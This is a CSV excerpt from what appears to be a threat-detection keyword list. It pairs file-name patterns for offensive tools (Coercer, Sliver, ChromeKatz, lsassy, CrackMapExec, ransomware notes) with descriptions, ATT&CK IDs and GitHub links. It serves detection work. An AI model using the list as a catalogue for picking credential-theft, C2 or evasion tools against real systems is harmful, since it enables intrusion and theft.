"*\coercer.exe*",".{0,1000}\\coercer\.exe.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","14574"
"*\Coercer.py*",".{0,1000}\\Coercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","14575"
"*\COFFLoader.exe*",".{0,1000}\\COFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","14576"
"*\combine.exe*",".{0,1000}\\combine\.exe.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","14577"
"*\combine_gui.exe*",".{0,1000}\\combine_gui\.exe.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","14578"
"*\COMHijackToolkit.ps1*",".{0,1000}\\COMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14579"
"*\COMHijackToolkit\*",".{0,1000}\\COMHijackToolkit\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14580"
"*\COM-Hunter.csproj*",".{0,1000}\\COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","14581"
"*\COM-Hunter.exe*",".{0,1000}\\COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","14582"
"*\COM-Hunter.sln*",".{0,1000}\\COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","14583"
"*\COMInject.exe*",".{0,1000}\\COMInject\.exe.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14584"
"*\COMInject.sln*",".{0,1000}\\COMInject\.sln.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14585"
"*\COMInjectTarget.cpp*",".{0,1000}\\COMInjectTarget\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14586"
"*\COMInjectTarget.dll*",".{0,1000}\\COMInjectTarget\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14587"
"*\COMInjectTarget\*",".{0,1000}\\COMInjectTarget\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","14588"
"*\Command Reciever.exe*",".{0,1000}\\Command\sReciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","14589"
"*\command\exec\sideload.go*",".{0,1000}\\command\\exec\\sideload\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","14590"
"*\command\exec\spawndll.go*",".{0,1000}\\command\\exec\\spawndll\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","14591"
"*\command_exec.exe*",".{0,1000}\\command_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","14592"
"*\commands\CameraScreenShot.cs*",".{0,1000}\\commands\\CameraScreenShot\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","14593"
"*\Commands\Machinecredentials.cs*",".{0,1000}\\Commands\\Machinecredentials\.cs.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","14594"
"*\common_pass.txt*",".{0,1000}\\common_pass\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","14595"
"*\COM-Object-hijacking-master*",".{0,1000}\\COM\-Object\-hijacking\-master.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","14596"
"*\CompressArchiveCommand.cs",".{0,1000}\\CompressArchiveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","14598"
"*\comsvcs_stealth.py*",".{0,1000}\\comsvcs_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","14599"
"*\ComunicationC2.cpp*",".{0,1000}\\ComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","14600"
"*\CONCRETE_STEEL.exe""*",".{0,1000}\\CONCRETE_STEEL\.exe\"".{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","14601"
"*\Configure-Server.psm1*",".{0,1000}\\Configure\-Server\.psm1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","14604"
"*\Configure-Victim.ps1*",".{0,1000}\\Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","14605"
"*\Configure-Victim.ps1*",".{0,1000}\\Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","14606"
"*\Confuser.CLI.exe*",".{0,1000}\\Confuser\.CLI\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14607"
"*\ConfuserEx.exe*",".{0,1000}\\ConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","14608"
"*\confuserex.py*",".{0,1000}\\confuserex\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","14609"
"*\ConfuserEx\*",".{0,1000}\\ConfuserEx\\.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","14610"
"*\ConfuserEx\Obfuscated.exe*",".{0,1000}\\ConfuserEx\\Obfuscated\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14611"
"*\ConfuserEx_bin.zip*",".{0,1000}\\ConfuserEx_bin\.zip.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","14612"
"*\consentfox.dll*",".{0,1000}\\consentfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","14615"
"*\conti1.txt*",".{0,1000}\\conti1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14618"
"*\conti2.txt*",".{0,1000}\\conti2\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14619"
"*\conti3.txt*",".{0,1000}\\conti3\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14620"
"*\conti4.txt*",".{0,1000}\\conti4\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14621"
"*\ConvertFrom-JWTtoken.ps1*",".{0,1000}\\ConvertFrom\-JWTtoken\.ps1.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","N/A","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","14627"
"*\Convert-ROT47.ps1*",".{0,1000}\\Convert\-ROT47\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14628"
"*\ConvertToShellcode.py*",".{0,1000}\\ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","14629"
"*\CookieData.txt --all*",".{0,1000}\\CookieData\.txt\s\-\-all.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","14630"
"*\CookieHijack.ps1*",".{0,1000}\\CookieHijack\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14631"
"*\CookieKatz.vcxproj*",".{0,1000}\\CookieKatz\.vcxproj.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14632"
"*\CookieKatz-BOF\*",".{0,1000}\\CookieKatz\-BOF\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14633"
"*\CookieKatzMinidump\*",".{0,1000}\\CookieKatzMinidump\\.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","14634"
"*\Coolvibes.exe*",".{0,1000}\\Coolvibes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14635"
"*\Cooolis-ms-Loader\*",".{0,1000}\\Cooolis\-ms\-Loader\\.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","14636"
"*\CopyItemCommand.cs",".{0,1000}\\CopyItemCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","14637"
"*\Copy-VSS.ps1*",".{0,1000}\\Copy\-VSS\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14638"
"*\Coringa-RAT 0.1.exe*",".{0,1000}\\Coringa\-RAT\s0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14639"
"*\CORINGA-RAT.exe*",".{0,1000}\\CORINGA\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14640"
"*\Corrupt_AMSI.py*",".{0,1000}\\Corrupt_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","14641"
"*\Corrupt_AMSI.vba*",".{0,1000}\\Corrupt_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","14642"
"*\CppWSManWinRM.exe*",".{0,1000}\\CppWSManWinRM\.exe.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","0","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","14643"
"*\crackmapexecwin*",".{0,1000}\\crackmapexecwin.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","14644"
"*\cradle.ps1*",".{0,1000}\\cradle\.ps1.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","14645"
"*\cradle.ps1*",".{0,1000}\\cradle\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","14646"
